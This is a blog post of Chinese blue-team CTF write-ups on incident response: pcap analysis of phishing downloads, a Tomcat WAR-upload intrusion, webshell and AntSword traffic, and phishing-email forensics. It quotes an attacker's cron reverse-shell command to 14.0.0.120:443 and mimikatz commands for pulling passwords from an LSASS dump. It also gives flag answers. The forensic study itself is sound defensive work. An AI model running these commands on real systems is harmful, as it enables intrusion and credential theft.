第六章 流量特征分析-小王公司收到的钓鱼邮件-中等
1、下载数据包文件 hacker1.pacapng,分析恶意程序访问了内嵌 URL 获取了 zip 压缩包,该 URL 是什么将该 URL作为 FLAG 提交 FLAG(形式:flag{xxxx.co.xxxx/w0ks//?YO=xxxxxxx}) (无需 http、https);
使用wireshark过滤出http数据包
跟随HTTP数据流
发现在/w0ks//?YO=1702920835 为请求数据包的uri
flag{tsdandassociates.co.sz/w0ks//?YO=1702920835}2、下载数据包文件 hacker1.pacapng,分析获取到的 zip 压缩包的 MD5 是什么 作为 FLAG 提交 FLAG(形式:flag{md5});
选中数据包右键导出为zip
使用md5进行校验
flag{f17dc5b1c30c512137e62993d1df9b2f}3、下载数据包文件 hacker1.pacapng,分析 zip 压缩包通过加载其中的 javascript 文件到另一个域名下载后续恶意程序, 该域名是什么?提交答案:flag{域名}(无需 http、https)
将js文件中的注释字符去除 发现url
flag{shakyastatuestrade.com}第六章 流量特征分析-常见攻击事件 tomcat-中等
简介
1、在web服务器上发现的可疑活动,流量分析会显示很多请求,这表明存在恶意的扫描行为,通过分析扫描的行为后提交攻击者IP flag格式:flag{ip},如:flag{127.0.0.1}
查看HTTP协议数据包 发现14.0.0.120 在上传war包
flag{14.0.0.120}2、找到攻击者IP后请通过技术手段确定其所在地址 flag格式: flag{城市英文小写}
在微步查看 发现是广州市
flag{guangzhou}3、哪一个端口提供对web服务器管理面板的访问?flag格式:flag{2222}
查看数据包可知是8080 端口
flag{8080}4、经过前面对攻击者行为的分析后,攻击者运用的工具是?flag格式:flag{名称}
查看数据包UA头 可知使用的是gobuster
flag{gobuster}5、攻击者拿到特定目录的线索后,想要通过暴力破解的方式登录,请通过分析流量找到攻击者登录成功的用户名和密码?flag格式:flag{root-123}
找到上传war 包的 数据包 查看
tomcat的账号密码为admin:tomcat
flag{admin-tomcat}6、攻击者登录成功后,先要建立反弹shell,请分析流量提交恶意文件的名称?flag格式:flag{114514.txt}
还是在上传war包的POST数据包中 可以找到上传的文件名
flag{JXQOZY.war}7、攻击者想要维持提权成功后的登录,请分析流量后提交关键的信息?flag提示,某种任务里的信息
计划任务中的信息
执行反弹shell
flag{/bin/bash -c 'bash -i >& /dev/tcp/14.0.0.120/443 0>&1'}第六章 流量特征分析-waf 上的截获的黑客攻击流量-中等
简介
应急响应工程师小徐在 waf 上下载了一段黑客的攻击流量,请你分析黑客的攻击流量,并且找到对应的关键信息提供给应急小组协助修复漏洞
1.黑客成功登录系统的密码 flag{xxxxxxxxxxxxxxx}
打开流量包过滤出HTTP协议数据包
找到POST数据包 可以发现使用用户名和密码登录成功
发现跳转到http://192.168.32.189/admin/index.php 这是登陆成功的表现
过滤规则
http.location == "[http://192.168.32.189/admin/index.php](http://192.168.32.189/admin/index.php)"一共发现5条登录成功数据包
在其中发现一个admin账号
密码为admin!@#pass123
flag{admin!@#pass123}2.黑客发现的关键字符串 flag{xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx}
strings web.pcap| grep flag
flag{87b7cb79481f317bde90c116cf36084b}3.黑客找到的数据库密码 flag{xxxxxxxxxxxxxxxx}
发现a.php 翻看a.php的返回包发现 数据库密码
flag{e667jUPvJjXHvEUv}第六章 流量特征分析-蚂蚁爱上树-中等
简介
@老狼 应急响应小组成员老狼在 waf 上下载了一段流量,请你分析黑客攻击手法,并且解答下面问题
1、管理员Admin账号的密码是什么?
过滤HTTP协议 跟随流 发现在50的时候上传了webshell 并且执行命令
过滤规则
_ws.col.info == "POST /onlineshop/product2.php HTTP/1.1 (application/x-www-form-urlencoded)"依次进行解密 发现添加了用户admin 密码为Password1
flag{Password1}2、LSASS.exe的程序进程ID是多少?
查看之前的数据包发现 在进行 hashdump操作
flag{852}3、用户WIN101的密码是什么?
导出后删除多余字符 后缀改成dmp
使用mimikatz读取密码
sekurlsa::minidump product2.dmp
sekurlsa::logonpasswords
flag{admin#123}第六章 流量特征分析-蚁剑流量分析-中等
简介
1.木马的连接密码是多少
数据包过滤HTTP 跟随HTTP数据流
密码为1
flag{1}2.黑客执行的第一个命令是什么
根据蚁剑流量特点去除前两个字符进行base64解码
可以发现是执行了id命令
flag{id}3.黑客读取了哪个文件的内容,提交文件绝对路径
继续查看数据流在第2个流 发现了/etc/passwd内容 可以判断读取了/etc/passwd
flag{/etc/passwd}4.黑客上传了什么文件到服务器,提交文件名
上传的文件为flag.txt
flag{flag.txt}5.黑客上传的文件内容是什么
666C61677B77726974655F666C61677D0A hex解码
flag{write_flag}6.黑客下载了哪个文件,提交文件绝对路径
flag{/var/www/html/config.php}第七章 常见攻击事件分析--钓鱼邮件-中等
简介
请勿在本机运行恶意文件样本 请勿在本机运行恶意文件样本 请勿在本机运行恶意文件样本 小张的公司最近遭到了钓鱼邮件攻击,多名员工的终端被控制做为跳板攻击了内网系统,请对钓鱼邮件样本和内网被攻陷的系统进行溯源分析,请根据小张备份的数据样本分析 请勿在本机运行恶意文件样本 请勿在本机运行恶意文件样本 请勿在本机运行恶意文件样本!!!!!
1、请分析获取黑客发送钓鱼邮件时使用的IP,flag格式:flag{11.22.33.44}
使用vscode打开邮件
在邮件中找到发送钓鱼邮件的IP
flag{121.204.224.15}2、请分析获取黑客钓鱼邮件中使用的木马程序的控制端IP,flag格式:flag{11.22.33.44}
将邮件上传到微步云沙箱 发现外联IP
flag{107.16.111.57}3、黑客在被控服务器上创建了webshell,请分析获取webshell的文件名,请使用完整文件格式,flag格式:flag{/var/www/html/shell.php}
使用find命令查找webshell
find ./ -name "*.php" | xargs grep --color=auto "eval"
flag{/var/www/html/admin/ebak/ReData.php}4、flag4: 黑客在被控服务器上创建了内网代理隐蔽通信隧道,请分析获取该隧道程序的文件名,请使用完整文件路径,flag格式:flag{/opt/apache2/shell}
在tmp目录下 发现本不应出现在这里的mysql及其配置文件,为异常点
查看my.conf发现为frp的配置文件,那么mysql毋庸置疑是frpc了
flag{/var/tmp/proc/mysql}原文始发于微信公众号(SSP安全研究):蓝队应急响应实战案例(五)恶意流量分析
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论